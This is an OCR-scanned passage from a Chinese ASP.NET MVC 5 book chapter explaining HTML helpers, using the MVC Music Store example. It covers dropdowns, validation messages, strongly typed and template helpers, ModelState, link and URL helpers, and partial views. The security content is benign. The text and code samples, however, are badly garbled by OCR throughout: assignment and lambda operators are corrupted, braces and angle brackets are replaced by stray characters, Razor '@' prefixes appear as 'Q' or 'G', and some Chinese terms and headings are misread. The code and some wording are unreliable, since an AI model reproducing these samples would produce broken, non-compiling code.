ID( 在 这 个 例子 的 HTML 标记 中 ， 紧 跟 其 后 的 输入 元 素 是 Genre 的 下 拉 列 表 )。 呈 现 的 界面 可 以 
利用 label 的 文本 为 用 户 提供 有 关 输 入 的 详细 描述 。 另 外 ， 如 果 用 户 单 击 label， 那 么 浏览 器 会 
把 焦点 传送 给 相关 的 输入 控件 。 这 一 点 对 于 复 选 框 和 单 选 按 钮 特别 有 用 ， 因 为 这 样 可 以 为 用 
户 提供 更 大 的 单 击 区域 ， 而 不 只 是 复 选 框 和 单 选 按钮 本 身 。 

细心 的 读者 可 能 已 经 注意 到 label 泻 染 的 文本 不 是 “Genreld”( 传 递 给 辅助 方法 的 字符 串 )， 
而 是 “Genre”。 在 可 能 的 情况 下 ， 辅 助 方法 使 用 任何 可 用 的 模型 元 数据 来 生成 显示 内 容 。 下 
面 探讨 表单 剩余 的 其 他 辅助 方法 ， 之 后 再 回 到 这 个 主题 。 


3. Html.DropDownList 和 Html.ListBox 


DropDownList 和 ListBox 辅 助 方法 都 返回 一 个 <select /> 元 素 。DropDownList 允 许 进行 单 
项 选择 ， 而 ListBox 支 持 多 项 选择 (在 要 泻 染 的 标记 中 ， 把 multiple 特 性 的 值 设置 为 multiple)。 

通常 情况 下 ，select 元 素 有 两 个 作用 : 

e 展示 可 选项 的 列表 

e 展示 字段 的 当前 值 

MVC Music Store 中 的 Album 类 有 一 个 GenreId 属 性 。 可 以 使 用 select 元 素来 显示 GenreId 属 
性 的 值 和 所 有 其 他 可 选项 。 

由 于 这 些 辅助 方法 都 需要 一 些 特定 的 信息 ， 因 此 当 在 控制 器 中 使 用 时 ， 还 需要 做 一 点 设 
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置 工作 。 下 拉 列 表 也 不 例外 ， 它 需要 一 个 包含 所 有 可 选项 的 SelectListItem 对 象 集合 ， 其 中 每 
一 个 SelectListItem 对 象 中 又 包含 有 Text、Value 和 Selected 三 个 属性 。 可 以 根据 需要 构建 自己 的 
SelectListItem 对 象 集合 ， 也 可 以 使 用 框架 中 的 SelectList 或 MultiSelectList 辅 助 方法 类 来 构建 。 这 
些 类 可 以 查看 任意 类 型 的 下 numerable 对 象 并 将 其 转换 为 SelectListltem 对 象 的 序列 。 例 如 ， 
StoreManager 控 制 器 中 的 Edit 操 作 : 


public ActionResult Edit(int id) 
t 
var album - storeDB.Albums.Single(a -» a.AlbumId -- id); 


ViewBag.Genres = new SelectList(storeDB.Genres.OrderBy(g -» g.Name), 


"GenreId", "Name", album.GenreId); 
return View (album); 
} 


这 里 的 控制 器 操作 不 仅 构建 了 主要 模型 (用 于 编辑 的 专辑 )， 还 构建 了 下 拉 列 表 辅 助 方法 
所 需要 的 表示 模型 。 从 上 面 的 代码 可 以 看 出 ，SelectList 构 造 函 数 的 参数 指定 了 原始 集合 (数据 
库 中 的 Genres 表 )、 作为 后 台 值 使 用 的 属性 名 称 (GenreId)、 作为 显示 文本 使 用 的 属性 名 称 (Name) 
以 及 当前 所 选项 的 值 ( 它 决定 将 哪 一 项 标记 为 选择 项 )。 

如 果 想 在 避免 反射 开销 的 同时 还 想 自己 生成 SelectListItem 集 合 ， 可 以 使 用 LINQ 的 Select 
方法 来 将 SelectListItem 对 象 集 放 入 项 目 Genres 中 : 

public ActionResult Edit(int id) 


{ 
var album = storeDB.Albums.Single(a => a.AlbumId == id); 


ViewBag.Genres - 
storeDB.Genres 
.OrderBy (g => g.Name) 
.AsEnumerable () 
.Select(g => new SelectListItem 
t 
Text = g.Name, 
Value - g.GenreId.ToString(), 
Selected = album.GenreId == g.GenreId 
nz 
return View (album); 
F 


4. Html.ValidationMessage 


当 ModelState 字 典 中 的 某 一 特定 字段 出 现 错误 时 , 可 以 使 用 ValidationMessage 辅 助 方 法 来 
显示 相应 的 错误 提示 消息 。 例 如 ， 在 下 面 的 控制 器 操作 中 ， 为 了 说 明 问 题 ， 故 意 在 模型 状态 
中 为 Title 属 性 添加 了 一 个 错误 : 

[HttpPost] 


public ActionResult Edit(int id, FormCollection collection) 
t var album - storeDB.Albums.Find (id); 


ModelState.AddModelError("Title", "What a terrible name!"); 
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return View (album); 
} 


在 视图 中 可 以 用 下 面 这 行 代码 显示 错误 提示 消息 ， 如 果 有 的 话 : 
@Html .ValidationMessage ("Title") 
执行 后 生成 的 HTML 标 记 如 下 : 


«span class-"field-validation-error" data-valmsg-for-"Title" 
data-valmsg-replace-"true"» 
What a terrible name! 
</span> 


这 条 消息 只 有 当 键 值 “Tite ”在 模型 状态 中 出 现 错误 时 才 会 出 现 。 也 可 以 调用 
@Html.ValidationMessage 的 一 个 重 写 方法 来 重 写 视图 中 的 错误 提示 消息 : 


@Html .ValidationMessage ("Title", "Something is wrong with your title") 
上 述 代 码 泻 染 的 HTML 形式 为 : 


«span class-"field-validation-error" data-valmsg-for-"Title" 
data-valmsg-replace-"false"»Something is wrong with your title 


按照 惯例 ， 当 出 现 错误 时 ， 这 个 辅助 方法 会 将 CSS 类 field-validation-error 和 
提供 的 任何 特定 CSS 类 一 起 泻 染 。 默 认 的 ASPNET MVC 项 目 模板 自 带 了 一 些 样 
式 ， 使 得 这 些 项 能 够 以 红色 显示 ， 如 果 不 喜欢 ， 可 在 style.css 文 件 中 修改 这 些 
样式 。 


到 目前 为 止 ， 已 经 介绍 了 辅助 方法 的 一 些 共同 特性 ， 如 HTML 编 码 和 HITMI 特性 的 设置 ， 
此 外 ， 当 谈 到 处 理 模型 值 和 模型 状态 时 ， 所 有 的 表单 输入 特性 还 有 一 些 共同 行为 。 


5.2.6 ”辅助 方法 、 模 型 和 视图 数据 


辅助 方法 提供 了 对 HTML 细 粒度 控制 的 同时 带 走 了 构建 UI( 要 在 合适 的 位 置 显示 控件 、 标 
签 、 错 误 消息 和 值 ) 的 乏味 工作 。 辅 助 方法 如 Html TextBox 和 Html DropDownList( 以 及 其 他 所 
有 表单 辅助 方法 ) 检 查 ViewData 对 象 以 获得 要 显示 的 当前 值 (在 ViewBag 对 象 中 的 所 有 值 也 可 
以 通过 ViewData 得 到 )。 

现在 暂时 不 考虑 要 创建 的 编辑 表单 ， 而 是 看 一 个 简单 的 例子 。 如 果 想 在 一 个 表单 中 设置 
专辑 的 价格 ， 可 使 用 下 面 的 控制 器 代码 。 

public ActionResult Edit(int id) 

j ViewBag.Price = 10.0; 


return View(); 
} 


在 相应 的 视图 中 ， 使 用 ViewBag 中 的 值 来 为 TextBox 辅 助 方法 命名 ， 可 以 实现 演 染 显示 价 
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格 的 文本 框 : 


QHtml .TextBox ("Price") 
TextBox 辅 助 方法 将 生成 如 下 所 示 的 HTML 标 记 : 


«input id-"Price" name-"Price" type-"text" value-"10" /> 


当 辅 助 方法 查看 ViewData 里 面 的 内 容 时 , 它们 也 能 看 到 其 中 的 对 象 属性 。 参照 下 面 代 码 ， 
修改 先前 的 控制 器 操作 : 
public ActionResult Edit(int id) 
t 
ViewBag.Album - new Album (Price - 11); 


return View(); 
) 


在 相应 的 视图 中 ， 可 以 用 下 面 这 行 代码 来 显示 一 个 带 有 专辑 价格 的 文本 框 : 
GHtml.TextBox ("Album. Price") 

现在 泻 染 出 的 HTML 标 记 如 下 所 示 : 

«input id-"Album Price" name-"Album.Price" type="text" value="11" /> 


如 果 在 ViewData 中 没有 匹配 “Album.Price” 的 值 ， 那 么 辅助 方法 将 尝试 查找 与 第 一 个 点 
之 前 那 部 分 名 称 (Album) 匹 配 的 值 。 换 言 之 ， 就 是 找 一 个 Album 类 型 的 对 象 。 然 后 ， 辅 助 方法 
估 测 名 称 中 剩余 的 部 分 (Price)， 并 找到 相应 的 值 。 

注意 泻 染 得 到 的 input 元 素 的 id 特 性 值 使 用 下 划 线 代替 了 点 (但 name 特 性 依然 使 用 点 )。 之 
所 以 这 样 做 ， 是 因为 在 id 特性 中 包含 点 是 非法 的 ， 因 此 ， 运 行 时 用 静态 属性 HtmlHelperId 
AttributeDotReplacement 的 值 代替 了 点 。 如 果 没 有 有 效 的 idq 特 性， 就 无 法 执行 带 有 JavaScript 
库 ( 如 jQuery) 的 客户 端 脚本 。 

TextBox 辅 助 方法 依靠 强 类 型 视图 数据 也 能 很 好 地 工作 。 例 如 ， 下 面 代 码 展 示 的 控制 器 
Edit 操 作 : 


public ActionResult Edit(int id) 

{ 
var album = new Album (Price = 12.0m); 
return View (album); 

} 


现在 回 到 ， 为 TextBox 辅 助 方法 提供 属性 名 称 来 显示 信息 : 

@Html . TextBox ("Price"); 

针对 上 面 的 代码 ， 辅 助 方法 将 生成 如 下 所 示 的 HTML 标 记 : 

«input id-"Price" name-"Price" type-"text" value-"12.0" /> 


如 果 想 避免 自动 地 查找 数据 ， 可 向 表单 辅助 方法 提供 一 个 显 式 的 值 。 有 时 ， 显 式 提 供 值 
的 方法 是 必需 的 。 返回 到 刚才 正在 构建 (用 来 编辑 专辑 信息 ) 的 表单 。 控 制 器 操作 代码 如 下 : 


public ActionResult Edit(int id) 
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t 
var album = storeDB.Albums.Single(a => a.AlbumId == id); 


ViewBag.Genres = new SelectList(storeDB.Genres.OrderBy(g => g.Name), 


"GenreId", "Name", album.GenreId); 
return View (album); 
} 


在 Album 的 强 类 型 编辑 视图 内 部 ， 可 使 用 下 面 这 行 代码 为 专辑 标题 泻 染 一 个 输入 元 素 : 
QHtml.TextBox("Title", Model.Title) 


方法 中 的 第 二 个 参数 显 式 地 提供 了 数据 值 。 为 什么 呢 ? 原来 在 这 种 情形 下 ， 音 乐 商店 的 
专辑 编辑 视图 像 许多 其 他 视图 一 样 ， 也 把 页 面 标题 放 在 了 ViewBag.Title 属 性 中 ， 因 此 Title 
值 已 经 存储 在 ViewData 中 。 在 Edit 视 图 的 顶部 可 以 看 到 如 下 内 容 : 

" ViewBag.Title = "Edit - " + Model.Title; 

} 

应 用 程序 的 _Layout.cshtml 视 图 通过 检索 ViewBag.Title 值 来 设置 泻 染 页 面 的 标题 。 如 果 只 
向 调用 的 TextBox 辅 助 方 法 传递 字符 串 Title， 那 么 它 就 在 ViewBag 中 查找 并 提取 出 里 面 的 Title 
值 (辅助 方法 在 查找 强 类 型 模型 对 象 之 前 , 会 首先 查看 ViewBag)。 这 种 情形 下 ,为 了 显示 合适 
的 标题 ， 我 们 需要 提供 显 式 值 。 这 是 一 个 重要 而 微妙 的 经 验 启 示 。 在 大 型 应 用 程序 中 ， 为 了 
更 加 清晰 地 确定 在 哪里 使 用 数据 ， 我 们 需要 在 一 些 视 图 数据 项 前 添加 前 级 。 例 如 ， 我 们 不 把 
主页 标题 命名 为 ViewBag.Title， 而 是 命名 为 诸如 ViewBag.Page_Title 的 名 称 ， 这 样 就 避免 了 与 
特定 页 面 的 命名 冲突 。 


5.2.7” 强 类 型 辅助 方法 


如 果 不 适 应 使 用 字符 串 字 面值 从 视图 数据 中 提取 值 的 话 ， 也 可 以 使 用 ASPNET MVC 提 
供 的 各 种 强 类 型 辅助 方法 。 使 用 强 类 型 辅助 方法 时 ， 只 需要 为 其 传递 一 个 lambda 表 达 式 来 指 
定 要 泻 染 的 模型 属性 。 表 达 式 的 模型 类 型 必须 和 为 视图 指定 的 模型 类 型 (使 用 @model 指 令 ) 一 
致 。 对 于 专辑 模型 的 强 类 型 视图 ， 需 要 在 视图 项 部 输入 如 下 所 示 的 代码 : 


@model MvcMusicStore.Models.Album 
一 旦 添加 模型 指令 ， 就 可 以 使 用 下 面 的 代码 重 写 前 面 的 专辑 编辑 表单 : 


@using (Html.BeginForm()) 
{ 
@Html.ValidationSummary (excludePropertyErrors: true) 
<fieldset> 
<legend>Edit Album</legend> 
<p> 
QHtml .LabelFor (m => m.GenreId) 
@Html .DropDownListFor (m => m.GenreId, ViewBag.Genres as SelectList) 
</p> 
<p> 
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GHtml.TextBoxFor(m => m.Title) 
QGHtml.ValidationMessageFor(m => m.Title) 
</p> 
<input type="submit" value="Save" /> 
</fieldset> 
) 


注意 ， 这 些 强 类 型 的 辅助 方法 名 称 除 了 有 “For” 后 级 之 外 ， 跟 先前 使 用 的 辅助 方法 还 有 
相同 的 名 称 。 尽 管 该 代码 生成 了 与 先前 代码 同样 的 HTML 标 记 ， 但 是 用 lambda 表 达 式 代 蔡 字 
符 串 还 有 许多 其 他 好 处 ， 其 中 包括 智能 感知 、 编 译 时 检查 和 轻松 的 代码 重 构 (如 果 在 模型 中 改 
变 一 个 属性 的 名 称 ，Visual Studio 会 自动 修改 视图 中 的 对 应 代码 )。 

一 般 情况 下 ， 可 为 处 理 模型 数据 的 每 个 辅助 方法 找到 一 个 与 其 对 应 的 强 类 型 方法 ， 第 4 
章 介绍 的 内 置 基 架 就 是 尽 可 能 地 使 用 这 些 强 类 型 辅助 方法 。 

注意 这 里 没有 显 式 地 为 Title 文 本 框 设置 值 ， 这 主要 是 因为 lambda 表 达 式 向 辅助 方法 提供 
了 足够 的 信息 ， 使 其 能 直接 读 取 模型 的 Title 属 性 来 获取 需要 的 值 。 


5.2.8 ”辅助 方法 和 模型 元 数据 


辅助 方法 不 仅 查 看 ViewData 内 部 的 数据 ， 它 们 也 利用 可 得 到 的 模型 元 数据 。 例 如 ， 专 辑 
编辑 表单 使 用 Label 辅 助 方法 来 为 流派 选择 列表 显示 一 个 label 元 素 : 


QHtml.Label("GenreId") 

这 个 辅助 方法 生成 如 下 HTML 标 记 : 

<label for="GenreId">Genre</label> 

文本 Genre 从 哪里 来 的 呢 ? 原来 它 是 当 辅助 方法 询问 运行 时 (runtime) 是 否 有 GenreId 的 可 
用 模型 元 数据 时 ， 运 行 时 从 装饰 Album 模 型 的 DisplayName 特 性 中 获取 的 信息 。 

[DisplayName ("Genre")] 

public int GenreId ( get; set; ) 

第 6 章 介绍 的 数据 注解 对 很 多 辅助 方法 都 有 重大 影响 ， 原 因 在 于 当 辅 助 方法 构建 HIML 
时 要 用 到 注解 提供 的 元 数据 。 下 面 介绍 的 模板 辅助 方法 可 以 更 深入 地 利用 这 些 元 数据 。 


5.2.9 ”模板 辅助 方法 


ASPNET MVC 中 的 模板 辅助 方法 利用 元 数据 和 模板 构建 HTML。 其 中 元 数据 包括 关于 模型 值 
( 它 的 名 称 和 类 型 ) 的 信息 和 (通过 数据 注解 或 自 定义 提供 器 添加 的 ) 模 型 元 数据 。 模 板 辅助 方法 有 
Html.Display 和 Html.Editor ， 以 及 分 别 与 它们 对 应 的 强 类 型 方法 Html.DisplayFor 和 
Html.EditorFor， 还 有 它们 对 应 的 完整 模型 Html.DisplayForModel 和 Html.EditorForModel。 
例如 Html.TextBoxFor 辅 助 方法 为 某 个 专辑 的 Title 属 性 生成 以 HTML 标 记 : 


«input id-"Title" name-"Title" type-"text" 
value-"For Those About To Rock We Salute You" /» 
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如 果 不 使 用 Html.TextBoxFor 辅 助 方 法 ， 也 可 以 用 EditorFor 方 法 取而代之 : 
QHtml.EditorFor(m => m.Title) 


尽管 两 种 方法 生成 的 是 同样 的 HTML 标 记 ， 但 是 EditorFor 方 法 可 以 通过 使 用 数据 注解 来 
改变 生成 的 HTML。 顾名思义 , 从 辅助 方法 的 名 称 Editor 来 看 , 就 知道 它 比 TextBox 辅 助 方法 (上 暗 
含 了 特定 类 型 的 输入 元 素 ) 应 用 广泛 。 当 使 用 模板 辅助 方法 时 , 运行 时 就 可 以 生成 它 觉得 合适 
的 任何 “编辑 器 ”下面 要 在 Title 属 性 上 添加 一 个 DataType 注 解 : 

[Required (ErrorMessage = "An Album Title is required")] 

[stringLength (160)] 


[DataType (DataType.MultilineText)] 
public string Title ( get; set; } 


添加 之 后 ，EditorFor 辅 助 方法 生成 如 下 HTML 标 记 : 


<textarea class="text-box multi-line" id="Title" name="Title"> 
Let There Be Rock 

</textarea> 

因为 是 在 一 般 意 义 上 请 求 一 个 编辑 器 ， 所 以 EditorFor 辅 助 方法 首先 查看 元 数据 ， 然 后 推 
断 出 应 该 使 用 的 最 适合 HTML 元 素 是 textarea 元 素 (因为 元 数据 指出 了 Title 属 性 可 容纳 多 行文 
本 )。 当 然 ， 尽 管 一 些 艺术 家 喜欢 使 用 长 长 的 标题 ， 但 是 大 部 分 专辑 标题 不 需要 多 行 输入 。 

模板 辅助 方法 DisplayForModel 和 EditorForModel 都 是 为 整个 模型 对 象 构建 HTML 的。 使 
用 这 些 辅助 方法 ， 可 以 为 一 个 模型 对 象 添 加 新 属性 ， 并 且 在 不 需要 对 视图 做 任何 修改 的 情况 
下 立即 在 UI 中 查看 修改 后 的 效果 。 

通过 编写 自 定义 的 显示 或 编辑 模板 可 控制 一 个 模板 辅助 方法 的 输出 (可 参阅 第 15 章 )。 


5.2.40 ”辅助 方法 和 ModelState 


用 来 显示 表单 值 的 所 有 辅助 方法 也 需要 与 ModelState 交 互 。 要 记 住 ，ModelState 是 模型 绑 
定 的 副产品 ， 并 且 存 储 模型 绑 定期 间 检 测 到 的 所 有 验证 错误 ， 以 及 用 户 提交 用 来 更 新 模型 的 
原始 值 。 
用 来 泻 染 表单 字段 的 辅助 方法 自动 在 ModelState 字 典 中 查找 它们 的 当前 值 。 辅 助 方法 使 
用 名 称 表 达 式 作为 键 ， 在 ModelState 字 典 中 进行 查找 。 如 果 查 找 的 值 已 在 ModelState 中 ， 辅 助 
方法 就 用 ModelState 中 的 值 替 换 视图 数据 中 的 当前 值 。 

模型 绑 定 失败 后 ，ModelState 查 找 表 中 允许 保存 “ 坏 ” 值 。 例 如 ， 如 果 用 户 向 DateTime 
属性 的 编辑 器 中 输入 值 “abc”， 模 型 绑 定 就 会 失败 ， 并 且 “abc” 也 会 保存 在 模型 状态 的 相关 
属性 中 。 为 了 让 用 户 修改 验证 错误 而 重新 泻 染 视图 时 ,，“abc” 值 依然 出 现在 DateTime 编 辑 器 
中 ， 可 让 用 户 看 到 刚才 尝试 的 错误 文本 并 允许 他 们 改正 错误 。 

当 ModelState 包 含 某 个 属性 的 错误 时 ， 与 错误 相关 的 表单 辅助 方法 除了 显 式 地 泻 染指 定 
的 CSS 类 之 外 ， 还 会 泻 染 input-validation-error CSS 类 。 项 目 模板 包含 的 默认 样式 表 style.css 中 
包含 了 类 input-validation-error 的 样式 。 
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5.3 ”其 他 输入 辅助 方法 


除了 前 面 已 经 谈 到 的 输入 辅助 方法 (如 TextBox 和 DropDownList) 之 外 ，ASPNET MVC 框 架 
还 包含 许多 其 他 的 辅助 方法 ， 它 们 涵盖 所 有 的 输入 控件 。 


5.3.1 Html.Hidden 
Html.Hidden 辅 助 方法 用 于 演 染 隐藏 的 输入 元 素 。 例 如 ， 下 面 这 行 代码 : 
(Html.Hidden("wizardStep", "1") 
会 生成 如 下 所 示 的 HTML 标 记 : 
«input id-"wizardStep" name-"wizardStep" type="hidden" value-"1" /> 


这 个 辅助 方法 的 强 类 型 版 本 是 Html.HiddenFor。 如 果 模 型 有 一 个 WizardStep 属 性 ， 就 可 以 
像 下 面 这 样 使 用 它 : 
@Html .HiddenFor (m => m.WizardStep) 


5.3.2 Html.Password 


Html.Password 辅 助 方法 用 于 泻 染 密码 字段 。 它 除了 不 保留 提交 值 ， 显 示 密 码 掩 码 之 外 ， 
基本 上 与 TextBox 辅 助 方法 一 样 。 下 面 的 代码 : 


QHtml.Password("UserPassword") 
会 生成 : 
<input id="UserPassword" name="UserPassword" type="password" value="" /> 


正如 预料 的 那样 ，Html.Password 的 强 类 型 方法 是 Html.PasswordFor。 下 面 的 代码 展示 了 
如 何 使 用 它 来 显示 UserPassword 属 性 : 


QHtml.PasswordFor(m => m.UserPassword) 
5.8.8 Html.RadioButton 


单 选 按钮 一 般 都 组 合 在 一 起 使 用 ， 为 用 户 的 单项 选择 提供 一 组 可 选项 。 例 如 ， 有 一 个 功 
能 要 让 用 户 从 一 个 特定 的 颜色 列表 中 选择 一 种 颜色 ， 就 可 以 使 用 多 个 单 选 按钮 来 表示 这 些 颜 
色 选 项 。 对 于 同一 组 中 的 单 选 按钮 ， 可 以 给 所 有 按钮 相同 名 称 。 最 后 当 提交 表单 时 ， 只 有 选 
择 的 单 选 按钮 会 发 送 到 服务 器 。 


下 面 代码 演示 了 使 用 HtmlRadioButton 辅 助 方法 泻 染 一 组 简单 的 单 选 按钮 : 


QHtml.RadioButton("color", "red") 
QHtml.RadioButton("color", "blue", true) 
QHtml.RadioButton("color", "green") 


生成 的 HTML 标 记 如 下 : 


«input id="color" name-"color" type="radio" value-"red" /> 
«input checked-"checked" id-"color" name-"color" type-"radio" value-"blue" /> 
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«input id-"color" name-"color" type-"radio" value-"green" /> 


Html.RadioButton 有 一 个 强 类 型 的 对 应 方法 Html.RadioButtonFor。 强 类 型 方法 不 使 用 名 称 
和 值 ， 而 是 用 表达 式 来 标识 那些 包含 有 要 泻 染 属性 的 对 象 ， 当 用 户 选择 单 选 按钮 时 ， 后 面 会 
跟 要 提交 的 值 ; 

QHtml.RadioButtonFor(m => m.GenreId, "1") Rock 

GHtml.RadioButtonFor(m -» m.GenreId, "2") Jazz 

GQHtml.RadioButtonFor(m => m.GenreId, "3") Pop 
5.3.4 Html.CheckBox 

CheckBox 辅 助 方法 是 唯一 一 个 泻 染 两 个 输入 元 素 的 辅助 方法 。 以 下 面 的 代码 为 例 : 


GHtml.CheckBox ("IsDiscounted") 


这 行 代码 生成 的 HTML 标 记 如 下 : 


«input id-"IsDiscounted" name-"IsDiscounted" type-"checkbox" value-"true" /> 

«input name-"IsDiscounted" type-"hidden" value-"false" /» 

看 到 上 面 生成 的 HTMIL 标记， 我 们 可 能 会 产生 一 个 疑问 : 除了 checkbox 的 输入 元 素 之 外 ， 
CheckBox 辅 助 方法 为 什么 还 要 泻 染 另 一 个 隐藏 的 输入 元 素 。 其 实 ， 它 泻 染 两 个 输入 元 素 的 主 
要 原因 是 ，HIML 规 范 中 规定 浏览 器 只 提交 “ 开 ”( 即 选中 的 ) 的 复 选 框 的 值 。 在 这 个 例子 中 ， 
第 二 个 隐藏 输入 元 素 就 保证 了 IsDiscounted 有 一 个 值 会 被 提交 ， 即 便 用 户 没有 选择 这 个 复 选 框 。 

尽管 许多 辅助 方法 专注 于 构建 表单 和 表单 输入 元 素 ， 但 在 一 般 的 泻 染 场合 中 还 是 存在 可 
用 辅助 方法 的 。 


5.4 泻 染 辅助 方法 


泻 染 辅助 方法 可 在 应 用 程序 中 生成 指向 其 他 资源 的 链接 ， 也 可 以 构建 被 称 为 部 分 视图 的 
可 重用 UI 片段 。 


5.4.1 Html.ActionLink 和 Html.RouteLink 


ActionLink 辅 助 方法 能 够 泻 染 一 个 超 链 接 ( 锚 标签 )， 演 染 的 链接 指向 另 一 个 控制 器 操作 。 
与 前 面 看 到 的 BeginForm 辅 助 方法 一 样 , ActionLink 辅 助 方法 在 后 台 使 用 路 由 API 来 生成 URL。 
例如 , 当 链接 的 操作 所 在 控制 器 与 用 来 泻 染 当前 视图 的 控制 器 一 样 时 , 只 需要 指定 操作 的 名 称 : 


QHtml.ActionLink("Link Text", "AnotherAction") 
这 里 假设 采用 的 是 默认 路 由 ， 那 么 这 行 代码 就 会 生成 如 下 所 示 的 HTML 标 记 : 
<a href="/Home/AnotherAction">LinkText</a> 


当 需 要 一 个 指向 不 同 控制 器 操作 的 链接 时 ， 可 通过 ActionLink 方 法 的 第 三 个 参数 来 指定 
控制 器 名 称 。 例 如 ， 要 链接 到 ShoppingCartController 控 制 器 的 Index 操 作 , 可 以 使 用 下 面 的 代码 : 


@Html.ActionLink ("Link Text", "Index", "ShoppingCart") 
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注意 上 面 指定 的 控制 器 名 称 中 没有 Controller 后 级 ， 也 就 是 说 没有 指定 控制 器 的 类 型 名 
称 。 但 ActionLink 方 法 能 够 知道 这 是 一 个 控制 器 名 称 ， 因 为 它 有 足够 的 关于 ASPNET MVC 控 
制 器 和 操作 的 知识 ， 刚 才 已 经 看 到 ， 这 些 辅助 方法 提供 的 重 载 版 本 允许 只 指定 操作 名 称 ， 或 
者 同时 指定 控制 器 名 称 和 操作 名 称 。 

在 很 多 应 用 场合 中 ， 路 由 参数 的 数量 会 超过 ActionLink 方 法 重 载 版 本 的 处 理 能 力 。 例 如 ， 
可 能 需要 在 路 由 中 传递 一 个 D 值 ， 或 者 应 用 程序 的 其 他 一 些 特定 路 由 参数 。 显 而 易 见 ， 内 置 
的 ActionLink 辅 助 方法 没有 提供 处 理 这 些 情形 的 重 载 版 本 。 

但 是 ， 我 们 可 以 通过 使 用 其 他 ActionLink 重 载 版 本 ， 来 向 辅助 方法 提供 所 必需 的 路 由 值 。 
其 中 有 一 个 版 本 允许 向 它 传递 一 个 RouteValueDictionary 类 型 的 对 象 ， 另 一 个 版 本 允许 给 
IouteValues 参 数 传递 一 个 对 象 (通常 是 匿名 类 型 的 )。 运 行 时 会 查看 该 对 象 的 属性 并 使 用 它们 来 
构建 路 由 值 (属性 名 称 就 是 路 由 参数 的 名 称 ， 属 性 值 代表 路 由 参数 的 值 )。 例 如 ， 构 建 一 个 指 
向 太 号 为 10720 的 专辑 编辑 页 面 的 链接 ， 我 们 可 以 使 用 如 下 所 示 的 代码 : 


@Html .ActionLink ("Edit link text", "Edit", "StoreManager", new {id=10720}, null) 


上 述 重 载 方法 的 最 后 一 个 参数 是 htmlAttributes。 在 本 章 前 面部 分 已 经 讲解 了 如 何 使 用 这 
个 参数 设置 HTML 元 素 上 的 特性 值 。 上 面 代码 传递 了 一 个 null( 实 际 上 没有 设置 HTML 元 素 上 
的 任何 特性 值 )。 尽 管 上 面 的 代码 未 设置 任何 特性 ， 但 是 为 了 调用 ActionLink 这 个 重 载 方法 ， 
必须 给 这 个 参数 传递 一 个 值 。 

尽管 RouteLink 辅 助 方法 和 ActionLink 辅 助 方法 遵循 相同 的 模式 , 但 是 RouteLink 只 可 以 接 
收 路 由 名 称 ， 而 不 能 接收 控制 器 名 称 和 操作 名 称 。 例 如 ， 演 示 ActionLink 的 第 一 个 例子 也 可 
以 用 下 面 的 代码 实现 : 


@Html .RouteLink ("Link Text", new (action-"AnotherAction"]) 


5.44.2 URL 辅助 方法 


URL 辅 助 方法 与 HTML 的 ActionLink 和 RouteLink 辅 助 方法 相似 ， 但 它 不 是 以 HTML 标 记 
的 形式 返回 构建 的 URL， 而 是 以 字符 串 的 形式 返回 这 些 URL。 对 此 ， 有 三 个 辅助 方法 : 


e Action 


e Content 

e RouteUrl 

Action 辅 助 方法 与 ActionLink 非 常 相似 ， 但 是 它 不 返回 锚 标签 。 例 如 ， 下 面 的 代码 会 显示 
浏览 商店 里 所 有 Jazz 专 辑 的 URL( 不 是 链接 ): 


«span» 
QUrl.Action("Browse", "Store", new ( genre = "Jazz" }, null) 
«/span» 


会 生成 如 下 所 示 的 HIML 标 记 : 


«span» 
/Store/Browse?genre-Jazz 
</span> 
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当 第 8 章 介 绍 Ajax 技术 时 ， 我 们 会 看 到 Action 方 法 的 另 一 种 用 法 。 

RouteUrl 辅 助 方法 与 Action 方 法 遵循 同样 的 模式 ， 但 与 RouteLink 一 样 ， 它 只 接收 路 由 名 
称 ， 而 不 接收 控制 器 名 称 和 操作 名 称 。 

Content 和 辅助 方法 特别 有 用 ， 因 为 它 可 以 把 应 用 程序 的 相对 路 径 转换 成 绝对 路 径 。 在 音乐 
商店 的 _Layout 视 图 中 可 以 看 到 Content 和 辅助 方法 的 效果 : 

«script src-"GUrl.Content ("~/Scripts/jquery-1.10.2.min.js")" 

type-"text/javascript"»«/script» 

上 面 代 码 在 传递 给 Content 辅 助 方法 的 字符 串 前 面 使 用 波浪 线 作 为 第 一 个 字符 , 这 样 无 论 
应 用 程序 部 署 在 什么 位 置 , 辅助 方法 都 可 以 让 其 生成 指向 正确 资源 的 URL( 这 里 可 以 把 波浪 线 
看 成 应 用 程序 的 根 目 录 )。 在 不 加 波浪 线 的 情况 下 ,如 果 在 目录 树 中 挪动 应 用 程序 虚拟 目录 的 
位 置 ， 生 成 的 URL 就 会 失效 。 

ASP.NET MVC 5 使 用 的 是 Razor 的 第 三 个 版 本 ,波浪 号 当 出 现在 script、style 和 img 元 素 的 
src 特 性 时 就 会 被 自动 解析 。 在 不 影响 运行 效果 的 情况 下 , 上 面 例子 代码 也 可 以 写成 如 下 形式 : 


<script src-"-/Scripts/jquery-1.5.1.min.js" type-"text/javascript"»«/script» 


5.4.3 Html.PartialftüHtml.RenderPartial 


Partial 辅 助 方法 用 于 将 部 分 视图 泻 染 成 字符 串 。 通 常情 况 下 ， 部 分 视图 中 包含 多 个 在 不 
同 视图 中 可 重复 使 用 的 标记 。Partial 方 法 共有 4 个 重 载 版 本 ， 如 下 所 示 : 

public void Partial(string partialViewName); 

public void Partial(string partialViewName, object model); 

public void Partial(string partialViewName, ViewDataDictionary viewData); 


public void Partial(string partialViewName, object model, 
ViewDataDictionary viewData); 


注意 这 里 没 必要 为 视图 指定 路 径 和 文件 扩展 名 ， 因 为 运行 时 定位 部 分 视图 与 定位 正常 视 


图 使 用 的 逻辑 相同 。 例 如 ， 下 面 代码 就 泻 染 一 个 名 为 AlbumDisplay 的 部 分 视图 。 运 行 时 使 用 
所 有 的 可 用 视图 引擎 来 查找 : 


@Html .Partial ("AlbumDisplay") 


RenderPartial 辅 助 方法 与 Partial 非 常 相似 ， 但 RenderPartial 不 是 返回 字符 串 ， 而 是 直接 写 
入 响应 输出 流 。 出 于 这 个 原因 , 必须 把 RenderPartial 放 入 代码 块 中 , 而 不 能 放 在 代码 表达 式 中 。 
为 了 说 明 这 一 点 ， 下 面 两 行 代码 向 输出 流 写 入 相同 的 内 容 : 


@{Html .RenderPartial ("AlbumDisplay a T AE 
QHtml .Partial ("AlbumDisplay ") 


这 里 ， 应 该 使 用 哪 一 个 方法 ，Partial 还 是 RenderPartial? 一 般 情况 下 ， 因 为 Partial 相 对 于 
RenderPartial 来 说 更 方便 (不 必 使 用 花 括号 将 调用 封装 在 代码 块 中 )， 所 以 应 该 选择 Partial。 然 
